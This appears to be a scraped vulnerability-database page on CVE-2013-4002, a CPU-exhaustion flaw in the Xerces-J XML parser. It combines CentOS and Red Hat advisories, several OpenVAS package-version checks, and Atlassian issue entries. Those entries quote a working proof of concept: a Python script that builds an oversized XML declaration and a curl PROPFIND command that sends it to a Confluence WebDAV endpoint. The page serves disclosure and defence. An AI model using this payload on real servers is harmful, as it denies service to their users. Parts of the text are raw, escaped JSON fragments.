ID: CESA-2014:1319
Type: centos
Reporter: CentOS Project
Modified: 2014-09-30T10:59:34

Description

CentOS Errata and Security Advisory CESA-2014:1319

Apache Xerces for Java (Xerces-J) is a high-performance, standards-compliant,
validating XML parser written in Java. The xerces-j2 packages provide
Xerces-J version 2.

A resource consumption issue was found in the way Xerces-J handled XML
declarations. A remote attacker could use an XML document with a specially
crafted declaration using a long pseudo-attribute name that, when parsed by
an application using Xerces-J, would cause that application to use an
excessive amount of CPU. (CVE-2013-4002)

All xerces-j2 users are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue. Applications using
Xerces-J must be restarted for this update to take effect.

Merged security bulletin from advisories:
http://lists.centos.org/pipermail/centos-announce/2014-September/020603.html
http://lists.centos.org/pipermail/centos-announce/2014-September/020605.html
6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"RHSA\", value:\"2014:1319-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2014-September/msg00058.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xerces-j2'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"xerces-j2\", rpm:\"xerces-j2~2.11.0~17.el7_0\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"xerces-j2\", rpm:\"xerces-j2~2.7.1~12.7.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xerces-j2-debuginfo\", rpm:\"xerces-j2-debuginfo~2.7.1~12.7.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:37:53", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-11-08T00:00:00", "id": "OPENVAS:1361412562310881819", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310881819", "title": "CentOS Update for java CESA-2013:1505 centos6", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:1505 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881819\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-08 10:44:42 +0530 (Fri, 08 Nov 2013)\");\n script_cve_id(\"CVE-2013-3829\", \"CVE-2013-4002\", \"CVE-2013-5772\", \"CVE-2013-5774\",\n \"CVE-2013-5778\", \"CVE-2013-5780\", \"CVE-2013-5782\", \"CVE-2013-5783\",\n \"CVE-2013-5784\", \"CVE-2013-5790\", \"CVE-2013-5797\", \"CVE-2013-5802\",\n \"CVE-2013-5803\", \"CVE-2013-5804\", \"CVE-2013-5809\", \"CVE-2013-5814\",\n \"CVE-2013-5817\", \"CVE-2013-5820\", \"CVE-2013-5823\", \"CVE-2013-5825\",\n \"CVE-2013-5829\", \"CVE-2013-5830\", \"CVE-2013-5840\", \"CVE-2013-5842\",\n 
\"CVE-2013-5849\", \"CVE-2013-5850\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for java CESA-2013:1505 centos6\");\n\n script_tag(name:\"affected\", value:\"java on CentOS 6\");\n script_tag(name:\"insight\", value:\"The java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime\nEnvironment and the OpenJDK 6 Java Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native image\nparsing code. A specially crafted image file could trigger a Java Virtual\nMachine memory corruption and, possibly, lead to arbitrary code execution\nwith the privileges of the user running the Java Virtual Machine.\n(CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public\nproxy classes. A remote attacker could possibly use this flaw to execute\narbitrary code with the privileges of the user running the Java Virtual\nMachine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA,\nJNDI, and Libraries components in OpenJDK. An untrusted Java application or\napplet could use these flaws to bypass Java sandbox restrictions.\n(CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850)\n\nMultiple input checking flaws were discovered in the JPEG image reading and\nwriting code in the 2D component. An untrusted Java application or applet\ncould use these flaws to corrupt the Java Virtual Machine memory and bypass\nJava sandbox restrictions. (CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the\njavax.xml.transform package transformers. A remote attacker could use this\nflaw to supply a crafted XML that would be processed without the intended\nsecurity restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components\nprocesses XML inputs. 
A remote attacker could create a crafted XML that\nwould cause a Java application to use an excessive amount of CPU and memory\nwhen processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries,\nSwing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An\nuntrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840,\nCVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5849, CVE-2013-5790,\nCVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly\ncheck bounds when performing image conversions. An untrusted Java\napplication or applet could use this flaw to disclose portions of the Java\nVirtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc\ndocumentation was generated from an untrusted Java source code and hosted\non a domain not controlled by the code author, these issues could make it\neasie ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"CESA\", value:\"2013:1505\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-November/020019.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.65.1.11.14.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.65.1.11.14.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.65.1.11.14.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.65.1.11.14.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.65.1.11.14.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:59", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2013-1505", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123534", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123534", "title": "Oracle Linux Local Check: ELSA-2013-1505", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-1505.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, 
http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123534\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:05:11 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-1505\");\n script_tag(name:\"insight\", value:\"ELSA-2013-1505 - java-1.6.0-openjdk security update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-1505\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-1505.html\");\n script_cve_id(\"CVE-2013-3829\", \"CVE-2013-4002\", \"CVE-2013-5772\", \"CVE-2013-5774\", \"CVE-2013-5778\", \"CVE-2013-5780\", \"CVE-2013-5782\", \"CVE-2013-5783\", \"CVE-2013-5784\", \"CVE-2013-5790\", \"CVE-2013-5797\", \"CVE-2013-5802\", \"CVE-2013-5803\", \"CVE-2013-5804\", \"CVE-2013-5809\", \"CVE-2013-5814\", \"CVE-2013-5817\", \"CVE-2013-5820\", \"CVE-2013-5823\", \"CVE-2013-5825\", \"CVE-2013-5829\", \"CVE-2013-5830\", \"CVE-2013-5840\", \"CVE-2013-5842\", \"CVE-2013-5849\", \"CVE-2013-5850\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.42.1.11.14.0.1.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.42.1.11.14.0.1.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = 
isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.42.1.11.14.0.1.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.42.1.11.14.0.1.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.42.1.11.14.0.1.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.65.1.11.14.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.65.1.11.14.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.65.1.11.14.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.65.1.11.14.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.65.1.11.14.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:59", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-11-08T00:00:00", "id": "OPENVAS:1361412562310881822", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310881822", "title": "CentOS Update for java CESA-2013:1505 centos5", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:1505 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881822\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-08 10:49:01 +0530 (Fri, 08 Nov 2013)\");\n script_cve_id(\"CVE-2013-3829\", \"CVE-2013-4002\", \"CVE-2013-5772\", \"CVE-2013-5774\",\n \"CVE-2013-5778\", \"CVE-2013-5780\", \"CVE-2013-5782\", \"CVE-2013-5783\",\n \"CVE-2013-5784\", \"CVE-2013-5790\", \"CVE-2013-5797\", \"CVE-2013-5802\",\n \"CVE-2013-5803\", \"CVE-2013-5804\", \"CVE-2013-5809\", \"CVE-2013-5814\",\n \"CVE-2013-5817\", \"CVE-2013-5820\", \"CVE-2013-5823\", \"CVE-2013-5825\",\n \"CVE-2013-5829\", \"CVE-2013-5830\", \"CVE-2013-5840\", \"CVE-2013-5842\",\n 
\"CVE-2013-5849\", \"CVE-2013-5850\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for java CESA-2013:1505 centos5\");\n\n script_tag(name:\"affected\", value:\"java on CentOS 5\");\n script_tag(name:\"insight\", value:\"The java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime\nEnvironment and the OpenJDK 6 Java Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native image\nparsing code. A specially crafted image file could trigger a Java Virtual\nMachine memory corruption and, possibly, lead to arbitrary code execution\nwith the privileges of the user running the Java Virtual Machine.\n(CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public\nproxy classes. A remote attacker could possibly use this flaw to execute\narbitrary code with the privileges of the user running the Java Virtual\nMachine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA,\nJNDI, and Libraries components in OpenJDK. An untrusted Java application or\napplet could use these flaws to bypass Java sandbox restrictions.\n(CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850)\n\nMultiple input checking flaws were discovered in the JPEG image reading and\nwriting code in the 2D component. An untrusted Java application or applet\ncould use these flaws to corrupt the Java Virtual Machine memory and bypass\nJava sandbox restrictions. (CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the\njavax.xml.transform package transformers. A remote attacker could use this\nflaw to supply a crafted XML that would be processed without the intended\nsecurity restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components\nprocesses XML inputs. 
A remote attacker could create a crafted XML that\nwould cause a Java application to use an excessive amount of CPU and memory\nwhen processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries,\nSwing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An\nuntrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840,\nCVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5849, CVE-2013-5790,\nCVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly\ncheck bounds when performing image conversions. An untrusted Java\napplication or applet could use this flaw to disclose portions of the Java\nVirtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc\ndocumentation was generated from an untrusted Java source code and hosted\non a domain not controlled by the code author, these issues could make it\neasie ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"CESA\", value:\"2013:1505\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-November/020016.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.42.1.11.14.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.42.1.11.14.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.42.1.11.14.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.42.1.11.14.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.42.1.11.14.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "atlassian": [{"lastseen": "2017-03-22T18:16:54", "bulletinFamily": "software", "description": "{quote}\r\nThere is WebDav endpoint that is accessible via following URL -\r\nhttps://pwnie.ninja/confluence/plugins/servlet/confluence/default . 
It is possible to pass XML as data for\r\nPROPFIND request.\r\nFollowing python code will generate XML with long pseudo-attribute name that exploits CVE-2013-4002\r\nissue.\r\n{code}\r\n#!/usr/bin/env python\r\nimport os\r\noutdir = raw_input('specify output directory > ')\r\n### XML to exploit CVE-2013-4002\r\nxml = \"<?xml \" + \"\\xe7\\x9a\\x84\"*1000000 + \"='china' version = '1.0'?><a/>\"\r\nwith open(os.path.join(outdir,'cve2013-4002.xml'),'w') as out:\r\nout.write(xml)\r\ndef sizeof(num, suffix='B'):\r\n for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:\r\n if abs(num) < 1024.0:\r\n return \"%3.1f%s%s\" % (num, unit, suffix)\r\n num /= 1024.0\r\n return \"%.1f%s%s\" % (num, 'Yi', suffix)\r\nprint \"[+] File 'cve2013-4002.xml':\", sizeof(len(xml))\r\n{code}\r\nAccording to XML specification there are only three valid pseudo-attributes: version, encoding and\r\nstandalone. When we submit any random pseudo-attribute with long name, secure version of Xerces-J\r\nparser just ignores it. At the same time vulnerable version will try to parse it. This will require much CPU\r\nwork.\r\nIf you try to send this request with curl, you will see that there is no immediate answer from server. 
You\r\nwill get \u201cGateway Time-out\u201d answer from the server after 4 minutes.\r\n{code}\r\ncurl -X 'PROPFIND' -H 'Depth: 0' -H 'Content-Type: application/xml'\r\n-H 'Authorization: Basic Z3IzM2t3YXJpb3I6c2ExODEyODM5MSE=' --databinary\r\n'@/tmp/cve2013-4002.xml'\r\nhttps://pwnie.ninja/confluence/plugins/servlet/confluence/default\r\n{code}\r\n{quote}", "modified": "2016-07-20T02:41:44", "published": "2015-06-19T06:43:36", "href": "https://jira.atlassian.com/browse/CONF-37991", "id": "ATLASSIAN:CONF-37991", "title": "Denial of Service attack through vulnerable Xerces-J library", "type": "atlassian", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-12-05T05:47:36", "bulletinFamily": "software", "description": "{quote}\r\nThere is WebDav endpoint that is accessible via following URL -\r\nhttps://pwnie.ninja/confluence/plugins/servlet/confluence/default . It is possible to pass XML as data for\r\nPROPFIND request.\r\nFollowing python code will generate XML with long pseudo-attribute name that exploits CVE-2013-4002\r\nissue.\r\n{code}\r\n#!/usr/bin/env python\r\nimport os\r\noutdir = raw_input('specify output directory > ')\r\n### XML to exploit CVE-2013-4002\r\nxml = \"<?xml \" + \"\\xe7\\x9a\\x84\"*1000000 + \"='china' version = '1.0'?><a/>\"\r\nwith open(os.path.join(outdir,'cve2013-4002.xml'),'w') as out:\r\nout.write(xml)\r\ndef sizeof(num, suffix='B'):\r\n for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:\r\n if abs(num) < 1024.0:\r\n return \"%3.1f%s%s\" % (num, unit, suffix)\r\n num /= 1024.0\r\n return \"%.1f%s%s\" % (num, 'Yi', suffix)\r\nprint \"[+] File 'cve2013-4002.xml':\", sizeof(len(xml))\r\n{code}\r\nAccording to XML specification there are only three valid pseudo-attributes: version, encoding and\r\nstandalone. When we submit any random pseudo-attribute with long name, secure version of Xerces-J\r\nparser just ignores it. At the same time vulnerable version will try to parse it. 
This will require much CPU\r\nwork.\r\nIf you try to send this request with curl, you will see that there is no immediate answer from server. You\r\nwill get \u201cGateway Time-out\u201d answer from the server after 4 minutes.\r\n{code}\r\ncurl -X 'PROPFIND' -H 'Depth: 0' -H 'Content-Type: application/xml'\r\n-H 'Authorization: Basic Z3IzM2t3YXJpb3I6c2ExODEyODM5MSE=' --databinary\r\n'@/tmp/cve2013-4002.xml'\r\nhttps://pwnie.ninja/confluence/plugins/servlet/confluence/default\r\n{code}\r\n{quote}", "modified": "2019-12-05T01:38:38", "published": "2015-06-19T06:43:36", "id": "ATLASSIAN:CONFSERVER-37991", "href": "https://jira.atlassian.com/browse/CONFSERVER-37991", "title": "Denial of Service attack through vulnerable Xerces-J library", "type": "atlassian", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:05", "bulletinFamily": "unix", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a specially\ncrafted declaration using a long pseudo-attribute name that, when parsed by\nan application using Xerces-J, would cause that application to use an\nexcessive amount of CPU. (CVE-2013-4002)\n\nThis release of JBoss Enterprise Application Platform also includes bug\nfixes and enhancements. 
A list of these changes is available from the JBoss\nEnterprise Application Platform 6.3.2 Downloads page on the Customer\nPortal.\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.3 on Red Hat\nEnterprise Linux 6 are advised to upgrade to these updated packages.\nThe JBoss server process must be restarted for the update to take effect.\n", "modified": "2018-06-07T02:41:56", "published": "2014-11-06T05:00:00", "id": "RHSA-2014:1818", "href": "https://access.redhat.com/errata/RHSA-2014:1818", "type": "redhat", "title": "(RHSA-2014:1818) Moderate: Red Hat JBoss Enterprise Application Platform 6.3.2 update", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:44:36", "bulletinFamily": "unix", "description": "Apache Xerces for Java (Xerces-J) is a high performance, standards\ncompliant, validating XML parser written in Java. The xerces-j2 packages\nprovide Xerces-J version 2.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a specially\ncrafted declaration using a long pseudo-attribute name that, when parsed by\nan application using Xerces-J, would cause that application to use an\nexcessive amount of CPU. (CVE-2013-4002)\n\nAll xerces-j2 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. 
